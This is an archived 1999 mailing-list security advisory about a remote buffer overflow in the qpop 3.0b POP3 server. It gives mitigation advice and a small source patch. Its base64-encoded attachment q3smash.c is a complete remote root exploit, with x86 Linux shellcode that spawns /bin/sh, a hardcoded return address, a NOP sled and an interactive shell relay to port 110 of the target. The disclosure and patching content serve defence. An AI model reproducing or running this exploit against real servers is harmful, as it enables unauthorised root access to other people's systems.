This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --8323328-493565404-943922963=:6421 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.4.04.9911300152181.6421at_private> Greetings, There is a remote buffer overflow in the qpop 3.0 server code that can lead to remote root compromise. Exploit attached. Vulnerable versions are all versions of qpop 3.0b, affected operating systems are _all_ systems that run it. Versions 2.52 and 2.53 do not contain this bug. The latest version available is 3.0b20, which is vulnerable, along with all previous 3.0 versions. I advise everyone running qpop3.0b servers to shut down the server IMMEDIATELY by disabling the entry in inetd.conf and then downgrading to v2.53 or another program until an official patch has been released. Details: The buffer overflow(s) are present in pop_msg.c (sounds familiar..) starting at line 68. All configurations and different builds seem to be vulnerable, as either vsprintf or sprintf are used, which both do not check bounds on the input buffers for each argument. Exploiting: The overflow code should not contain characters 0x0c/x17/x20, because it would get interpreted as more than one argument and hence fail. Patching: I included a small patch. You should only use inofficial patches if you totally need to use version 3.0, otherwise downgrade and wait for a patch from Qualcomm. IF you patch this by yourself, please consider that the buffer pointer CHANGES and the buffer is about 30 bytes LESS than the defined MAXLINELEN!! PS: The installation file suggests to run qpopper without tcpd, e.g.: pop3 stream tcp nowait root /usr/local/lib/qpopper qpopper -s I would NOT suggest doing it that way. Use: pop3 stream tcp nowait root /usr/sbin/tcpd qpopper -s instead. At least for me it works behind a tcp wrapper, and that way, you can use access control and every connection _attempt_ gets logged. Mixter ________________________ mixterat_private members.tripod.com/mixtersecurity --8323328-493565404-943922963=:6421 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="q3smash.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.04.9911300149230.6421at_private> Content-Description: Content-Disposition: ATTACHMENT; FILENAME="q3smash.c" LyoNCiAqIFFwb3BwZXIgMy4wYiByZW1vdGUgZXhwbG9pdCBmb3IgeDg2IExp bnV4ICh0ZXN0ZWQgb24gUmVkSGF0LzIuMC4zOCkNCiAqDQogKiBEZWMgMTk5 OSBieSBNaXh0ZXIgPG1peHRlckBuZXd5b3Jrb2ZmaWNlLmNvbT4gLyBodHRw Oi8vMTMzNy50c3gub3JnDQogKg0KICogRXhwbG9pdHMgcG9wX21zZyBidWZm ZXIgb3ZlcmZsb3cgdG8gc3Bhd24gYSByZW1vdGUgcm9vdCBzaGVsbC4NCiAq IFRoaXMgcHJvYmFibHkgd29ya3Mgd2l0aCB0aGUgb2xkIHFwb3AyIGNvZGUg Zm9yIGJzZCwgc29sYXJpcyBhbnlvbmU/DQogKiANCiAqIFdBUk5JTkc6IFlP VSBBUkUgVVNJTkcgVEhJUyBTT0ZUV0FSRSBPTiBZT1VSIE9XTiBSSVNLLiBU SElTIElTIEENCiAqIFBST09GLU9GLUNPTkNFUFQgUFJPR1JBTSBBTkQgWU9V IFRBS0UgRlVMTCBSRVNQT05TSUJJTElUWSBGT1IgV0hBVCBZT1UNCiAqIERP IFdJVEggSVQhIERPIE5PVCBBQlVTRSBUSElTIEZPUiBJTExJQ0lUIFBVUlBP U0VTIQ0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0 cmluZy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGxp Yi5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9z b2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8 YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxl cnJuby5oPg0KDQojZGVmaW5lIE5PUAkJMHg5MA0KI2RlZmluZSBMRU4JCTEw MzINCiNkZWZpbmUgQ09ERVNUQVJUCTg4MA0KI2RlZmluZSBSRVQJCTB4YmZm ZmQ2NTUNCg0KLyogeDg2IGxpbnV4IHNoZWxsY29kZS4gdGhpcyBjYW4gYmUg YSBzaW1wbGUgZXhlY3ZlIHRvIC9iaW4vc2ggb24gYWxsDQogICBzeXN0ZW1z LCBidXQgTVVTVCBOT1QgY29udGFpbiB0aGUgY2hhcmFjdGVycyAneDE3JyBv ciAneDBjJyBiZWNhdXNlDQogICB0aGF0IHdvdWxkIHNwbGl0IHRoZSBleHBs b2l0IGNvZGUgaW50byBzZXBhcmF0ZSBhcmcgYnVmZmVycyAgICAgICAgKi8N Cg0KY2hhciAqc2hlbGxjb2RlID0NCiJceGViXHgyMlx4NWVceDg5XHhmM1x4 ODlceGY3XHg4M1x4YzdceDA3XHgzMVx4YzBceGFhXHg4OVx4ZjlceDg5XHhm MFx4YWIiDQoiXHg4OVx4ZmFceDMxXHhjMFx4YWJceGIwXHgwNFx4MDRceDA3 XHhjZFx4ODBceDMxXHhjMFx4ODlceGMzXHg0MFx4Y2RceDgwIg0KIlx4ZThc eGQ5XHhmZlx4ZmZceGZmL2Jpbi9zaCI7DQoNCnVuc2lnbmVkIGxvbmcgcmVz b2x2ZSAoY2hhciAqKTsNCnZvaWQgdGVybSAoaW50LCBpbnQpOw0KdW5zaWdu ZWQgbG9uZyBnZXRfc3AgKCk7DQoNCmludCANCm1haW4gKGludCBhcmdjLCBj aGFyICoqYXJndikNCnsNCiAgY2hhciBidWZmZXJbTEVOXTsNCiAgY2hhciAq Y29kZXB0ciA9IHNoZWxsY29kZTsNCiAgbG9uZyByZXRhZGRyID0gUkVUOw0K ICBpbnQgaSwgczsNCiAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCg0KICBp ZiAoYXJnYyA8IDIpDQogICAgew0KICAgICAgcHJpbnRmICgidXNhZ2U6ICVz IDxob3N0PiBbb2Zmc2V0XVxuIiwgYXJndlswXSk7DQogICAgICBwcmludGYg KCJ1c2Ugb2Zmc2V0IC0xIHRvIHRyeSBsb2NhbCBlc3BcbiIpOw0KICAgICAg ZXhpdCAoMCk7DQogICAgfQ0KDQogIGlmIChhcmdjID4gMikNCiAgICB7DQog ICAgICBpZiAoYXRvaSAoYXJndlsyXSkgPT0gLTEpDQoJew0KCSAgLyogODAw MCA9IGFwcHJveC4gYnl0ZSBvZmZzZXQgdG8gcXBvcHBlcidzIHRvcCBvZiBz dGFjaw0KCSAgICAgYXQgdGhlIHRpbWUgaXQgcHJpbnRzIG91dCB0aGUgYXV0 aCBlcnJvciBtZXNzYWdlICovDQoJICByZXRhZGRyID0gZ2V0X3NwICgpIC0g ODAwMCAtIExFTjsNCgkgIHByaW50ZiAoIlVzaW5nIGxvY2FsIGVzcCBhcyBy ZXQgYWRkcmVzcy4uLlxuIik7DQoJfQ0KICAgICAgcmV0YWRkciArPSBhdG9p IChhcmd2WzJdKTsNCiAgICB9DQoNCiAgZm9yIChpID0gMDsgaSA8IExFTjsg aSsrKQ0KICAgICooYnVmZmVyICsgaSkgPSBOT1A7DQoNCiAgZm9yIChpID0g Q09ERVNUQVJUICsgMjsgaSA8IExFTjsgaSArPSA0KQ0KICAgICooaW50ICop ICZidWZmZXJbaV0gPSByZXRhZGRyOw0KDQogIGZvciAoaSA9IENPREVTVEFS VDsgaSA8IENPREVTVEFSVCArIHN0cmxlbiAoc2hlbGxjb2RlKTsgaSsrKQ0K ICAgICooYnVmZmVyICsgaSkgPSAqKGNvZGVwdHIrKyk7DQoNCiAgYnVmZmVy WzBdID0gJ0EnOw0KICBidWZmZXJbMV0gPSAnVSc7DQogIGJ1ZmZlclsyXSA9 ICdUJzsNCiAgYnVmZmVyWzNdID0gJ0gnOw0KICBidWZmZXJbNF0gPSAnICc7 DQoNCiAgcHJpbnRmICgicXBvcCAzLjAgcmVtb3RlIHJvb3QgZXhwbG9pdCAo bGludXgpIGJ5IE1peHRlclxuIik7DQogIHByaW50ZiAoIltyZXR1cm4gYWRk cmVzczogMHglbHggYnVmZmVyIHNpemU6ICVkIGNvZGUgc2l6ZTogJWRdXG4i LA0KCSAgcmV0YWRkciwgc3RybGVuIChidWZmZXIpLCBzdHJsZW4gKHNoZWxs Y29kZSkpOw0KDQogIGZmbHVzaCAoMCk7DQoNCiAgc2luLnNpbl9mYW1pbHkg PSBBRl9JTkVUOw0KICBzaW4uc2luX3BvcnQgPSBodG9ucyAoMTEwKTsNCiAg c2luLnNpbl9hZGRyLnNfYWRkciA9IHJlc29sdmUgKGFyZ3ZbMV0pOw0KICBz ID0gc29ja2V0IChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQoNCiAgaWYg KGNvbm5lY3QgKHMsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9m IChzdHJ1Y3Qgc29ja2FkZHIpKSA8IDApDQogICAgew0KICAgICAgcGVycm9y ICgiY29ubmVjdCIpOw0KICAgICAgZXhpdCAoMCk7DQogICAgfQ0KDQogIHN3 aXRjaCAod3JpdGUgKHMsIGJ1ZmZlciwgc3RybGVuIChidWZmZXIpKSkNCiAg ICB7DQogICAgY2FzZSAwOg0KICAgIGNhc2UgLTE6DQogICAgICBmcHJpbnRm IChzdGRlcnIsICJ3cml0ZSBlcnJvcjogJXNcbiIsIHN0cmVycm9yIChlcnJu bykpOw0KICAgICAgYnJlYWs7DQogICAgZGVmYXVsdDoNCiAgICAgIGJyZWFr Ow0KICAgIH0NCiAgd3JpdGUgKHMsICJcblxuIiwgMSk7DQogIHRlcm0gKHMs IDApOw0KDQogIHJldHVybiAwOw0KfQ0KDQp1bnNpZ25lZCBsb25nDQpyZXNv bHZlIChjaGFyICpob3N0KQ0Kew0KICBzdHJ1Y3QgaG9zdGVudCAqaGU7DQog IHN0cnVjdCBzb2NrYWRkcl9pbiB0bXA7DQogIGlmIChpbmV0X2FkZHIgKGhv c3QpICE9IC0xKQ0KICAgIHJldHVybiAoaW5ldF9hZGRyIChob3N0KSk7DQog IGhlID0gZ2V0aG9zdGJ5bmFtZSAoaG9zdCk7DQogIGlmIChoZSkNCiAgICBt ZW1jcHkgKChjYWRkcl90KSAmIHRtcC5zaW5fYWRkci5zX2FkZHIsIGhlLT5o X2FkZHIsIGhlLT5oX2xlbmd0aCk7DQogIGVsc2UNCiAgICB7DQogICAgICBw ZXJyb3IgKCJnZXRob3N0YnluYW1lIik7DQogICAgICBleGl0ICgwKTsNCiAg ICB9DQogIHJldHVybiAodG1wLnNpbl9hZGRyLnNfYWRkcik7DQp9DQoNCnVu c2lnbmVkIGxvbmcNCmdldF9zcCAodm9pZCkNCnsNCiAgX19hc21fXyAoIm1v dmwgJWVzcCwgJWVheCIpOw0KfQ0KDQp2b2lkDQp0ZXJtIChpbnQgcCwgaW50 IGMpDQp7DQogIGNoYXIgYnVmW0xFTl07DQogIGZkX3NldCByZmRzOw0KICBp bnQgaTsNCg0KICB3aGlsZSAoMSkNCiAgICB7DQogICAgICBGRF9aRVJPICgm cmZkcyk7DQogICAgICBGRF9TRVQgKHAsICZyZmRzKTsNCiAgICAgIEZEX1NF VCAoYywgJnJmZHMpOw0KICAgICAgaWYgKHNlbGVjdCAoKHAgPiBjID8gcCA6 IGMpICsgMSwgJnJmZHMsIE5VTEwsIE5VTEwsIE5VTEwpIDwgMSkNCglyZXR1 cm47DQogICAgICBpZiAoRkRfSVNTRVQgKGMsICZyZmRzKSkNCgl7DQoJICBp ZiAoKGkgPSByZWFkIChjLCBidWYsIHNpemVvZiAoYnVmKSkpIDwgMSkNCgkg ICAgZXhpdCAoMCk7DQoJICBlbHNlDQoJICAgIHdyaXRlIChwLCBidWYsIGkp Ow0KCX0NCiAgICAgIGlmIChGRF9JU1NFVCAocCwgJnJmZHMpKQ0KCXsNCgkg IGlmICgoaSA9IHJlYWQgKHAsIGJ1Ziwgc2l6ZW9mIChidWYpKSkgPCAxKQ0K CSAgICBleGl0ICgwKTsNCgkgIGVsc2UNCgkgICAgd3JpdGUgKGMsIGJ1Ziwg aSk7DQoJfQ0KICAgIH0NCn0NCg== --8323328-493565404-943922963=:6421 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="qp3b20.patch" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.04.9911300149231.6421at_private> Content-Description: Content-Disposition: ATTACHMENT; FILENAME="qp3b20.patch" IyBhcHBseSB0aGlzIGluIHRoZSBxcG9wcGVyMy4wYjIwL3BvcHBlci8gZGly ZWN0b3J5IHdpdGggcGF0Y2ggPCBxcDNiMjAucGF0Y2gNCi0tLSBwb3BfbXNn LmMub2xkCU1vbiBOb3YgMjkgMjM6NDI6MDMgMTk5OQ0KKysrIHBvcF9tc2cu YwlNb24gTm92IDI5IDIzOjUyOjA4IDE5OTkNCkBAIC02NSw3ICs2NSw3IEBA DQogICAgIC8qICBBcHBlbmQgdGhlIG1lc3NhZ2UgKGZvcm1hdHRlZCwgaWYg bmVjZXNzYXJ5KSAqLw0KICAgICBpZiAoZm9ybWF0KSB7DQogI2lmZGVmIEhB VkVfVlBSSU5URg0KLSAgICAgICAgdnNwcmludGYobXAsZm9ybWF0LGFwKTsN CisgICAgICAgIHZzbnByaW50ZihtcCxNQVhMSU5FTEVOIC0gMTAwLCBmb3Jt YXQsYXApOw0KICNlbHNlDQogIyBpZmRlZiBQWVJBTUlEDQogCWFyZzEgPSB2 YV9hcmcoYXAsIGNoYXIgKik7DQpAQCAtNzQsOSArNzQsOSBAQA0KIAlhcmc0 ID0gdmFfYXJnKGFwLCBjaGFyICopOw0KIAlhcmc1ID0gdmFfYXJnKGFwLCBj aGFyICopOw0KIAlhcmc2ID0gdmFfYXJnKGFwLCBjaGFyICopOw0KLSAgICAg ICAgKHZvaWQpc3ByaW50ZihtcCxmb3JtYXQsIGFyZzEsIGFyZzIsIGFyZzMs IGFyZzQsIGFyZzUsIGFyZzYpOw0KKyAgICAgICAgKHZvaWQpc3ByaW50Ziht cCxNQVhMSU5FTEVOIC0gMTAwLCBmb3JtYXQsIGFyZzEsIGFyZzIsIGFyZzMs IGFyZzQsIGFyZzUsIGFyZzYpOw0KICMgZWxzZQ0KLSAgICAgICAgKHZvaWQp c3ByaW50ZihtcCxmb3JtYXQsKChpbnQgKilhcClbMF0sKChpbnQgKilhcClb MV0sKChpbnQgKilhcClbMl0sDQorICAgICAgICAodm9pZClzcHJpbnRmKG1w LE1BWExJTkVMRU4gLSAxMDAsIGZvcm1hdCwoKGludCAqKWFwKVswXSwoKGlu dCAqKWFwKVsxXSwoKGludCAqKWFwKVsyXSwNCiAJCSAgICAgICgoaW50ICop YXApWzNdLCgoaW50ICopYXApWzRdKTsNCiAjIGVuZGlmDQogI2VuZGlmDQo= --8323328-493565404-943922963=:6421--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:15:01 PDT